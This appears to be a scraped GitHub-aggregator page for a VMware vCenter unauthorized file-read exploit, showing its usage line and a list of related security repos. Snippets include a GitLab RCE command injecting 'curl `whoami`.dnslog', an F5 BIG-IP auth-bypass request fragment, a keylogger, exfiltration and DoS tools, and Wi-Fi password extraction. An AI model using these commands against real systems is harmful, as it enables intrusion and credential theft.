VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

Last update: Sep 23, 2022

Overview

vcenter_fileread_exploit

VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

Usage

python3 vCenter_fileread.py http(s)://ip

References

https://github.com/l0ggg/VMware_vCenter?fbclid=IwAR3JfQTRI7ZGcsB2nh-IAZPkCLwGgiLcv_u1LBxHDCzULcUDvH14Z2yhG0g .

Owner

Ashish Kunwar

Researcher @ RISKIQ | I deal with 0days and malwares

GitHub Repository

An automated header extensive scanner for detecting log4j RCE CVE-2021-44228

log4j An automated header extensive scanner for detecting log4j RCE CVE-2021-44228 Usage $ python3 log4j.py -l urls.txt --dns-log REPLACE_THIS.dnslog.

2 Dec 16, 2021

CVE-2022-21907 - Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: Windows HTTP协议栈远程代码执行漏洞 creat

365 Nov 30, 2022

CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本： Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

70 Nov 09, 2022

Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage and potential attacks.

Dependency Combobulator Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage

84 Dec 23, 2022

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE

CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE. POST /mgmt/tm/util/bash HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */

81 Dec 12, 2022

Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service

Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service. This tool can help a digital forensic investigator to know the conte

96 Dec 20, 2022

Automated tool to find & created Exploit Poc for Clickjacking Vulnerability

ClickJackPoc This tool will help you automate finding Clickjacking Vulnerability by just passing a file containing list of Targets . Once the Target i

24 Dec 19, 2022

Log4j minecraft with python

Apache-Log4j Apache Log4j 远程代码执行攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响 Steps 【Import

57 Oct 03, 2022

Files related to PoC||GTFO 21:21 - NSA’s Backdoor of the PX1000-Cr

Files related to PoC||GTFO 21:21 - NSA’s Backdoor of the PX1000-Cr 64bit2key.py

15 Nov 26, 2022

Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本，扫描主机上所有java进程，检测是否引入了有漏洞的log4j-core jar包，是否可能遭到远程代码执行攻击（CVE-2021-45046）。上传扫描报告到指定的服

86 Dec 09, 2022

A traceroute tool that also displays IP information

infotr A traceroute tool that also displays IP information. This tool has only been tested on Linux. Quick Start First, install this tool from PyPI. p

10 Oct 29, 2022

DoSer.py - Simple DoSer in Python

DoSer.py - Simple DoSer in Python What is DoSer? DoSer is basically an HTTP Denial of Service attack that affects threaded servers. It works like this

1 Oct 12, 2021

CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight;

CloakifyFactory CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight; Evade DLP/MLS Devices; Social Engineering of

3 Oct 18, 2022

"KeyLogger-WebService" Is a Keylogger Write In python.

KeyLogger-WebService "KeyLogger-WebService" Is a Keylogger Write In python. When you Inject the file on a computer once the file is opened on the comp

21 Dec 16, 2022

labsecurity is a framework and its use is for ethical hacking and computer security

labsecurity labsecurity is a framework and its use is for ethical hacking and computer security. Warning This tool is only for educational purpose. If

16 Dec 08, 2022

windows电脑查看全部连接过的WiFi密码

python WIFI历史密码查看器 WIFI密码查看器原理 win+R，输入cmd打开命令行窗口 #这个命令可以列出你所有连接过的wifi netsh wlan show profiles #替换你要查找的WiFi名称，就可以显示出这个wifi的所有信息，包括密码 netsh wlan show

15 Dec 22, 2022

IP Denial of Service Vulnerability ")A proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability ")

CVE-2021-24086 This is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability "), a NULL dereference in tcpip.sys patc

1 Nov 25, 2021

VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

Related tags

Overview

vcenter_fileread_exploit

Usage

References

Owner

Ashish Kunwar

An automated header extensive scanner for detecting log4j RCE CVE-2021-44228

CVE-2022-21907 - Windows HTTP协议栈远程代码执行漏洞 CVE-2022-21907

CVE-2021-22205 Unauthorized RCE

Dependency Combobulator is an Open-Source, modular and extensible framework to detect and prevent dependency confusion leakage and potential attacks.

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE

Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service

Automated tool to find & created Exploit Poc for Clickjacking Vulnerability

Log4j minecraft with python

Files related to PoC||GTFO 21:21 - NSA’s Backdoor of the PX1000-Cr

Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

A traceroute tool that also displays IP information

DoSer.py - Simple DoSer in Python

CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight;

"KeyLogger-WebService" Is a Keylogger Write In python.

labsecurity is a framework and its use is for ethical hacking and computer security

windows电脑查看全部连接过的WiFi密码

IP Denial of Service Vulnerability ")A proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability ")

A small script to export all AWAF policies from a BIG-IP device

Fuzzercorn - Bring libfuzzer to Unicorn

S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE